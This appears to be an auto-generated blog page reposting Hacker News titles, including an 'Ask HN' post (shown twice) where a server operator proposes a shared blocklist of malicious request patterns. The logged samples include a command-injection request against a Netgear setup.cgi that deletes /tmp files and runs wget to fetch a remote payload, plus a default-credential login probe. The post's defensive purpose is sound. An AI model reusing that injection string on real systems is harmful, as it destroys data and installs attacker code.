Lisp as an alternative to Java
17 by azhenley | 0 comments on Hacker News.
Tuesday, April 6, 2021
New top story on Hacker News: Ask HN: Can we collaborate on a IP Address or Regex blacklist?
Ask HN: Can we collaborate on a IP Address or Regex blacklist?
11 by usernamebias | 16 comments on Hacker News.
Hear me out. I've recently started logging pings to my services, A LOT of servers ping me constantly checking for things like '.env' and other known vulnerabilities. I currently have a JSON dataset of about 10K entries. It looks like this. { "offense": "boaform/admin/formLogin?username=ec8&psd=ec8", "ipAddress": "125.47.68.164" }, { "offense": ".env", "ipAddress": "52.224.55.198" }, { "offense": "setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+https://ift.tt/3wziuvW", "ipAddress": "115.58.115.18" } Maybe we don't filter by ip address, and instead filter requests based on known strings (or regex). That's what i'm currently doing. Ex. If request includes '.env'. Blocked! I'd love to implement a more aggressive strategy. Rather than a reactive one. I'm currently finding myself going through server logs, and adding new 'keywords' to the 'banned list'. Like a 'ad blocklist' we can use as middleware in our HTTP applications. If something exists already, kindly point me to a Github.
11 by usernamebias | 16 comments on Hacker News.
Hear me out. I've recently started logging pings to my services, A LOT of servers ping me constantly checking for things like '.env' and other known vulnerabilities. I currently have a JSON dataset of about 10K entries. It looks like this. { "offense": "boaform/admin/formLogin?username=ec8&psd=ec8", "ipAddress": "125.47.68.164" }, { "offense": ".env", "ipAddress": "52.224.55.198" }, { "offense": "setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+https://ift.tt/3wziuvW", "ipAddress": "115.58.115.18" } Maybe we don't filter by ip address, and instead filter requests based on known strings (or regex). That's what i'm currently doing. Ex. If request includes '.env'. Blocked! I'd love to implement a more aggressive strategy. Rather than a reactive one. I'm currently finding myself going through server logs, and adding new 'keywords' to the 'banned list'. Like a 'ad blocklist' we can use as middleware in our HTTP applications. If something exists already, kindly point me to a Github.
New top story on Hacker News: 7% of Americans don’t use the internet. Who are they?
7% of Americans don’t use the internet. Who are they?
20 by ipsocannibal | 17 comments on Hacker News.
20 by ipsocannibal | 17 comments on Hacker News.
Subscribe to:
Comments (Atom)